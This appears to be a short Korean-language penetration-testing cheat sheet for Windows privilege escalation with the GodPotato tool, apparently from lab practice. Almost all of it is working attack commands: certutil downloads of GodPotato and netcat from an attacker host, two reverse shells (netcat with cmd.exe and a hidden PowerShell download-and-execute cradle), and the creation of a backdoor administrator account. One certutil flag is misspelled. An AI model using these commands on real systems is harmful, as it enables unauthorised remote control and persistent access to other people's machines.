NET Framework version 확인

reg query "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP"

GodPotato 공격자 칼리에서 타겟 호스트로 Transfer

certutil -urlcahce -split -f http://<attacker-ip>/GodPotato.exe gp.exe

기본 테스트

.\\gp.exe -cmd "whoami"

.\\gp.exe -cmd "cmd.exe /c whoami /all > C:\\Users\\merlin\\Desktop\\god.txt"

type C:\\Users\\merlin\\Desktop\\god.txt

리버스 쉘 - nc.exe

# nc.exe transfer
certutil -urlcache -split -f http://<attacker-IP>/nc64.exe nc.exe

# test
.\\nc.exe <attacker-IP> 80 -e C:\\Windows\\system32\\cmd.exe 

# GodPotato
.\\gp.exe -cmd ".\\nc.exe <attacker-IP> 80 -e C:\\Windows\\System32\\cmd.exe"

리버스 쉘 2

# 공격자
rlwrap nc -lvnp 4444

# 타겟
.\\GodPotato.exe -cmd "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.9/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444"

Admin 만들기

GodPotato.exe -cmd "net user wook P@ssw0rd! /add"
GodPotato.exe -cmd "net localgroup administrators wook /add"